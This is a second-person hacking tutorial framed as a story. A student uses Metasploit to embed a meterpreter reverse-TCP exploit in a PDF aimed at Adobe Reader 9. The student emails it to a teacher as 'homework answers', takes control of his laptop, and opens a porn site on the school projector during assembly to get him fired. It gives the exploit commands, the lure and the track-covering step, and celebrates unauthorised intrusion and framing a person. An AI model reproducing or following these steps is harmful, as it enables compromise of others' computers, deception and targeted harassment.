Real Scenarios #2: The Creepy Teacher [Part 2]
In part one of this tutorial we found out that your English teacher is a paedophile, by using a Man in the Middle attack to intercept his internet traffic.
Now you're faced with the dilemma of how to alert other staff at the school to how creepy he is without letting on that you've been sniffing around the school network...
You need to find a way to tell the other staff to what you've found, but without them suspecting that you're involved.
A good start is to get control of his computer, so you think about how, and do some reconnaissance, but you don't come up with anything.
One day in a lesson, you see him open a PDF on the projector, using Adobe Reader 9!
Since you've practised hacking Reader 9 in your Virtual Hacking Lab at home , you know that Adobe Reader 9 is vulnerable to an exploit that can be deployed just by opening a malicious PDF.
If you can create a PDF containing the exploit and get him to open it, you can take control of his computer!
You're going to use Metasploit to create the malicious PDF, so type
at the terminal to open it.
Once the Metasploit Framework has loaded up, you type
- msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
to select the appropriate exploit, then use
- set payload windows/meterpreter/reverse_tcp
to set the payload.
You need to provide a PDF for Metasploit to embed the exploit in, so you create a PDF called answers.pdf using Reader 9, then feed it to metasploit:
- set INFILENAME answers.pdf
- set FILENAME answers.pdf
set the relevant file options, and then it's simply a case of providing your school network IP address for the exploit to connect back to:
- set LHOST 192.168.1.78
This creates the PDF, at the location /root/.msf4/local/answers.pdf
Now that you have your PDF, you need to somehow get your teacher to open it.
You decide to email it to him one lunchtime, telling him that it contains your homework answers.
You sneak off, send the email, then open the metasploit handler to receive control of his computer, by typing
- use exploit/multi/handler
at the metasploit prompt.
You configure the options:
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.78
Then run the hander:
After a few minutes, you get a connection!
Straight after, you email him a document with your actual homework in, saying you accidentally send an empty document, so he doesn't suspect anything.
Success! You have control of his computer!
Now how can you use that fact to get him fired?
It's assembly tomorrow, and the whole school; staff and pupils, will be in one room, and guess what? The English teacher is doing a short powerpoint presentation about how to write applications (no, not that type of application) for college. If only we could get something less desirable than his presention appear on the projector...
The stage is set!
The day comes, and you're sitting at the back of the hall watching the headteacher drone on about grades. She finishes, and as your English teacherstands up and plugs his laptop into the projector to begin his presentation, you slip out of the door at the back of the hall.
Run Run Run!
You grab your laptop from your locker, then type this into the remote shell on his computer (now plugged into the projecter).
- explorer "http://pornhub.com"
You hit enter, and smile as you imagine the scene in the hall as his default browser (probably internet explorer, another reason to fire him) cheerfully pops up and displays pornhub.com on the projector.
It might not be concrete evidence, but it's enough for an investigation to be started, which is enough.
Two days later, he's fired. Good Job.